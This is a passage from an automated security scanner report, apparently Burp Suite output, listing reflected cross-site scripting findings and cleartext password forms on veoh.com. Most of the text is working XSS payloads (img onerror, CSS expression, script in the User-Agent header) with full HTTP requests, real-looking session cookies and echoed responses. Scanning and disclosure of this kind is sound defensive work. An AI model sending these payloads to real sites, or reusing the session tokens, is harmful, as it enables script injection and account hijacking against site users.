Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4472
Date: Thu, 03 Feb 2011 21:46:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90

<div class="categories categories-9" id="categories-videos97565"><img src=a onerror=alert(1)>386056b84fa">
<ul><li class="column1"><a href="/browse/videos97565%22%3E%3Cimg+src%3Da+onerror%3Dalert
...[SNIP]...

1.72. http://www.veoh.com/category/list/tab/webseries [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/webseries

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 was submitted in the REST URL parameter 4. This input was echoed as ac136"><img src=a onerror=alert(1)>223b61dcbe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/webseriesac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4550
Date: Thu, 03 Feb 2011 21:46:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=81

<div class="categories categories-9" id="categories-webseriesac136"><img src=a onerror=alert(1)>223b61dcbe7">
<ul><li class="column1"><a href="/browse/webseriesac136%22%3E%3Cimg+src%3Da+onerror%3
...[SNIP]...

1.73. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download/index/permalinkId/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 was submitted in the REST URL parameter 4. This input was echoed as b2a30"style="x:expression(alert(1))"fc975c07eb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /download/index/permalinkId/v18978294NGnK88j8b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:21 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 26859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="thumb_browse_1" href="/browse/videos/category//watch/v18978294NGnK88j8b2a30"style="x:expression(alert(1))"fc975c07eb6" title="" class="thumb thumbLink" onclick="">
...[SNIP]...

1.74. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/-MENUVALUE-

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b was submitted in the REST URL parameter 4. This input was echoed as ce5ce<img src=a onerror=alert(1)>c10905c976b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/-MENUVALUE-ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:49:08 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 59484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"-MENUVALUE-ce5ce<img src=a onerror=alert(1)>c10905c976b","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea>
...[SNIP]...

1.75. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/-MENUVALUE-

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e was submitted in the REST URL parameter 4. This input was echoed as cc326"><img src=a onerror=alert(1)>67cf1c4032e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/-MENUVALUE-cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:48:43 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 59675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/search/videos/q/-MENUVALUE-cc326"><img src=a onerror=alert(1)>67cf1c4032e" selected="selected">
...[SNIP]...

1.76. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/publisher:bunny12344

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 was submitted in the REST URL parameter 4. This input was echoed as 14861"><img src=a onerror=alert(1)>93bdcf942a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/publisher:bunny1234414861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:48:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 60152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/search/videos/q/publisher:bunny1234414861"><img src=a onerror=alert(1)>93bdcf942a3" selected="selected">
...[SNIP]...

1.77. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/publisher:bunny12344

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 was submitted in the REST URL parameter 4. This input was echoed as e34d7<img src=a onerror=alert(1)>3d0b8bddcb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/publisher:bunny12344e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:49:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=62
Content-Length: 59961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"publisher:bunny12344e34d7<img src=a onerror=alert(1)>3d0b8bddcb4","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea>
...[SNIP]...

1.78. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/flag/permalinkId/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a041"style%3d"x%3aexpression(alert(1))"ad20725130b was submitted in the REST URL parameter 4. This input was echoed as 1a041"style="x:expression(alert(1))"ad20725130b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /video/flag/permalinkId/v18978294NGnK88j81a041"style%3d"x%3aexpression(alert(1))"ad20725130b HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=88
Content-Length: 32282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<form id="flagVideoForm" method="post" action="/video/submitflag/permalinkId/v18978294NGnK88j81a041"style="x:expression(alert(1))"ad20725130b" name="flagVideoForm" onsubmit="return verifyFlag(this);">
...[SNIP]...

1.79. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/share/permalinkId/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 was submitted in the REST URL parameter 4. This input was echoed as 42a1c"style="x:expression(alert(1))"80e77e495a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /video/share/permalinkId/v18978294NGnK88j842a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 30205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="text" onclick="this.select();" value="http://www.veoh.com/browse/videos/category//watch/v18978294NGnK88j842a1c"style="x:expression(alert(1))"80e77e495a9" readonly="true" />
...[SNIP]...

1.80. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/flag/permalinkId/v18978294NGnK88j8

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266d5"><script>alert(1)</script>a3477cdc5c1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /video/flag/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:15 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=70
Content-Length: 32288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1" id="flagUserAgent" name="flagUserAgent"/>
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 8 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.veoh.com/favorites  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favorites

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favorites HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

2.2. http://www.veoh.com/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:54 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

2.3. http://www.veoh.com/messages/inbox  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /messages/inbox

Issue detail

